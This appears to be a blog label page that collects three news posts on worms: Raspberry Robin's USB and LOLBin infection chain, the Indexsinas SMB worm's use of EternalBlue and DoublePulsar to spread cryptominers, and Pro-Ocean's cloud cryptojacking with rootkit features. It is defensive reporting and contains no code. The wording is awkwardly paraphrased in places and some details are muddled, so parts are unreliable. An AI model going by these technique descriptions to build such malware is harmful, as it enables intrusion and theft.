Search This Blog

Showing posts with label worm. Show all posts

Microsoft Detects Raspberry Robin Worm in Windows Networks

According to Microsoft, a recently detected Windows worm has been discovered on the networks of hundreds of firms from numerous industry sectors. 

The malware, called Raspberry Robin, spreads via infected USB devices and was discovered by Red Canary intelligence experts in September 2021.] In early November, cybersecurity company Sekoia detected it using QNAP NAS devices as command and control servers (C2) servers, while Microsoft stated it discovered harmful artefacts tied to this worm produced in 2019. 

Redmond's findings are consistent with those of Red Canary's Detection Engineering team, which discovered this worm on the networks of several clients, including several in the technology and manufacturing industries. Despite the fact that Microsoft saw the malware communicating to Tor network addresses, the threat actors are yet to exploit the access they gained to their victims' networks. 

As already mentioned, Raspberry Robin is spreading to new Windows frameworks by means of contaminated USB drives containing a noxious .LNK document. When the USB gadget is joined and the user taps the link, the worm brings forth a msiexec interaction utilizing cmd.exe to send off a noxious document put away on the contaminated drive. It infects new Windows gadgets, speaks with its order and control servers (C2), and executes noxious payloads utilizing a few genuine Windows utilities: 
  • fodhelper (a trusted binary for managing features in Windows settings),
  • msiexec (command line Windows Installer component),
  • and odbcconf (a tool for configuring ODBC drivers).
"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware," Red Canary researchers explained. "Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes."

Security specialists who have seen Raspberry Robin in the wild are yet to link the malware to a threat group and are yet dealing with tracking down its administrators' ultimate objective. In any case, Microsoft has labelled this mission as high-risk, considering that the attackers could download and convey extra malware inside the casualties' organizations and heighten their honours anytime.

Indexsinas SMB Worm Attacks Vulnerable Environments


The  Indexsinas SMB worm is aiming for susceptible situations in which scientists cautioned – focusing on healthcare, hospitality, education, and the telecommunications industries. Its ultimate objective is to reduce crypto miners on hacked PCs. 

Since 2019, Indexsinas, aka NSABuffMiner, has been lurked. It uses the old weapon arsenal Equation Group, along with EternalBlue and EternalRomance, to invade Windows SMB shares and DoublePulsar backdoor. Indexsinas is using lateral mobility to assimilate specific environments aggressively. 

“Propagation is achieved through the combination of an open-source port scanner and three Equation Group exploits – EternalBlue, DoublePulsar, and EternalRomance,” as per a Guardicore Labs analysis 

Since 2019, Indexsinas has deployed a broad infrastructure consisting of over 1,300 devices operating as sources of attack, and every device is accountable for only certain cases of attack (most likely hacked systems, Guardicore observed, particularly in India, the USA, and Vietnam). To date, almost 2,000 different attacks have been reported in Guardicore's telemetry. 

The shroud of attacks to find out more about cyber attackers behind Indexsinas is quite difficult to breach. 

“The Indexsinas attackers are careful and calculated,” according to the firm. “The campaign has been running for years with the same command-and-control domain, hosted in South Korea. The [command-and-control] C2 server is highly protected, patched, and exposes no redundant ports to the internet. The attackers use a private mining pool for their crypto mining operations, which prevents anyone from accessing their wallets’ statistics.” 

According to Guardicore Labs, the attack commences when a machine is infringed using the NSA's tools. These attacks run code in the kernel of the victim and can inject payloads to user mode utilizing asynchronous procedure calls (APCs). 

Researchers noted, “Indexsinas uses the exploits to inject code to either explorer.exe or lsass.exe. The injected payloads – EternalBlue.dll for 32-bit and DoublePulsar.dll for 64-bit – download three executable files from the main C2 server.”

It has been reported that there is a whole reversed DLL file in the file downloads which is a Portable Executable file, a version of a Gh0stCringe remote access tool (RAT). 

The first one installs the RAT, while the second provides a key feature for C2 commands and reporting machine information, including computer name, malware group ID, date of installation, and technical specs of CPUs. 

The files iexplore.exe and services.exe meanwhile install two services utilizing the tool which impersonates the Windows svchost.exe function. The first service has to drop the crypto miner, whereas the second just runs the crypto miner module. 

c64.exe, which in turn dumps two files is yet another payload downloaded as part of the initial stage. One is the executable ctfmon.exe — the propagation tool. 

“Ctfmon.exe is responsible for finding potential victims and exploiting them using Equation Group’s tools – and it does that extremely thoroughly,” researchers said. “It uses exploits for both 32-bit and 64-bit machines and scans both RPC (TCP 139) and SMB (TCP 445) ports. Moreover, it tries to move laterally within the organizational network as well as spread across the internet.” 

A timetabled task performs a batch script that installs a service. The service launches a second batch script that scans and uses the port. 

The batch scripts in these flows also uninstall the services of competitors, end their operations and erase their files. 

“It is crucial that network administrators, IT teams, and security personnel be able to easily identify assets and the services they run,” they explained. “Specifically, it should be easy to spot internet-facing servers, SMB included. With visibility in place, network admins would want to limit the access from and to different assets and the network services they expose.” 

Corporate functions and production activities, for example, should be separated. Policy rules can also be applied that secure SMB servers of an organization, such as the interdiction of internet access via SMB or only permit specified IP addresses to access the firm's internet fileserver. This can help in prevention against Indexsinas Worm Infections.

Rocke Group’s Pro Ocean Crypto-jacking Malware now Comes with Worm Feature


The Rocke Group's used cloud-targeted malware for carrying out crypto-jacking attacks for Monero that was documented in 2019 by Unit 42 researchers. Since then, the malware has been present in cybersecurity firms, which hindered the crypto-jacking activity of the Rocke Community. The threat actors behind the attack have reportedly updated the malware as researchers discovered a modified malware version used by the Rocke Community, a cyber-crime gang that attacks crypto-jack cloud infrastructure. 

The malware is known as "Pro Ocean," first detected in 2019, and now includes "worm" features and the detection-evasion features of rootkits. 

For cloud apps, Pro-Ocean utilizes well-known vulnerabilities Pro-Ocean attacked Apache ActiveMQ, Oracle WebLogic (CVE-2017-10271), and Redis in their study. If the malware is built-in Tencent Cloud or Alibaba Cloud, one can disable tracking agents using the same code of the previous malware to prevent detection. If the malware is installed, it destroys any operation that heavily uses the Kernel to use 100% of the CPU and Monero effectively. 

“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,” said Aviv Sasson. “As we saw, this sample can delete some cloud providers’ agents and evade their detection,” Sasson further added. 

The malware is comprised of four components: a rootkit package, which installs a rootkit and many other malice utilities, an XMRig mining module; a Watchdog module with two Bash scripts (to see whether the malware runs a strong CPU scan and some process). 

The latter “worm” feature is a recent Pro-Ocean addition. The ransomware now reverts to the public IP address of the victim's computer with a Python infection script. This is achieved by using an online service, which scopes IP addresses for different web servers with an "" address. The script then attempts in the same 16-Bit subnet to corrupt all computers (e.g. 10.0.X.X). The Pro-Ocean malware has also added new rootkit capabilities that cloak its malicious activity. 

“It does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,” said Sasson. Researchers said that they believe, Rocke Group will be constantly modifying its malware, particularly as the cloud expands as a lucrative target for attackers.